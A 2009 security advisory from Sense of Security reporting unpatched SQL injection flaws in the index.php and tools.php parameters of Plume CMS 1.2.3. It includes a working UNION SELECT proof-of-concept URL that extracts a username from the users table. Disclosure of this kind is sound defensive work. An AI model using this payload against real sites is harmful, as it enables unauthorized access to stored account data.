The innovations for the future need
secure foundations today.

With information technology now embedded in all business activities, security is an enterprise concern.

Plume CMS Multiple SQL Injection Vulnerabilities

Sense of Security - Security Advisory - SOS-09-006 

Release Date.                  12-Aug-2009
Last Update.                   12-Aug-2009
Vendor Notification Date.      16-Jun-2009
Product.                       Plume CMS
Platform.                      Independent
Affected versions.             1.2.3 (verified), possibly others
Severity Rating.               High
Impact.                        Manipulation of data
Attack Vector.                 Remote with authentication
Solution Status.               Unpatched
CVE reference.                 Not yet allocated

Details.
Plume CMS is a content management system written in PHP. The 
application suffers from SQL injection vulnerabilities in 
index.php and tools.php, as it fails to validate data supplied 
in the 'm' variable of index.php before being used in a SQL 
query. Additionally, the variable .id. of tools.php is also 
vulnerable to the same type of attack.

SQL injection attacks can give an attacker access to backend 
database contents, the ability to remotely execute system 
commands, or in some circumstances the means to take control 
of the operating system hosting the database.

Proof of Concept.
The below POC will return the first username from the users
table:
/plume/manager/index.php?m=1 UNION SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,user_username,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL FROM plume_users LIMIT 1,1--

Solution.
None.

Discovered by.
SOS Labs.

Telephone 1300 922 923.

For an engagement enquiry.
For an information request.